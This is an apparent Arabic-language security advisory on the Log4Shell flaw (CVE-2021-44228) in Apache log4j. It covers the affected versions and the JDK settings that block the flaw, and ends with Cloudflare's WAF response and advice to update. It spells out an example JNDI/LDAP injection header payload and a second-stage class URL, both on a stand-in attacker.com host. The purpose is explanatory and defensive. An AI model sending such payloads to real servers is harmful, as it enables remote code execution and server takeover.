تم الاعلان عن اكتشاف ثغرة عالية الخطورة في مكتبة log4j احد مكاتب لغة البرمجة الشهيرة Java وتتسبب الثغرة في الحصول على RCE وهذا ما يعني التحكم الكامل في السيرفر (Full Access)
وتصنف المكتبة على انها واسعة الانتشار في التطبيقات المختلفة , تم التصنيف في CVE الكود الخاص بالثغرة هو CVE-2021-44228
تم الكشف عن الثغرة بواسطة فريق السيكيوريتي في شركة Alibaba . يمكنك الاطلاع على POC
اشهر التطببيقات المصابة
- Steam
- Apple ICloud
- Mincraft
يتوجب علينا التنويه بأن الاصدارات اعلى من التالية من JDK ليست مصابة بالثغرة (6u211, 7u201, 8u191, 11.0.1) كما يتضح في البوينتر ادناه ان القيمة الخاصة به False وهذا يعني انه لا يمكن تنفيذ remote code
com.sun.jndi.ldap.object.trustURLCodebaseالاصدارات المصابة
2.0 <= Apache log4j <= 2.14.1
الية الاستغلال
- يتم ارسال request من المهاجم الى السيرفر المراد استهدافه عن طريق curl على سبيل المثال
- يتم اضافة الهيدر الخاص بالاستغلال والذي يتمثل في الpayload التالي
'X-Api-Version: ${jn**di:ld**ap://attacker.com/a}' - يقوم نظام Java Naming and Directory Interface (JNDI) بارسال طلب الى الدومين الذي تم حقنه في البيلود المضاف بالهيدر .
- يقوم السيرفر الخاص بالمخترق بالرد وتفعيل الجزء الثاني من البيلود الخاص به , وهذا يسمى Staged payload عن طريق المثال التالي
http://second-stage.attacker.com/Exploit.class
مثال على كود مصاب وهو من الشائع استخدامه حسب الطريق المبينه في المثال ادناه
شركة كلاود فلير تطمئن مستخدميها
قامت شركة كلاود فلير بعمل تحديث طارئ على ال WAF rules الخاصة بال managed WAF لمستخدميها وقامت بحجب الطلبات الواردة التي تحمل الهيدر المرفق
اذا كنت تستخدم المكتبة فسارع بالتحديث لها لتفادي اي هجمات سيبرانية محتملة
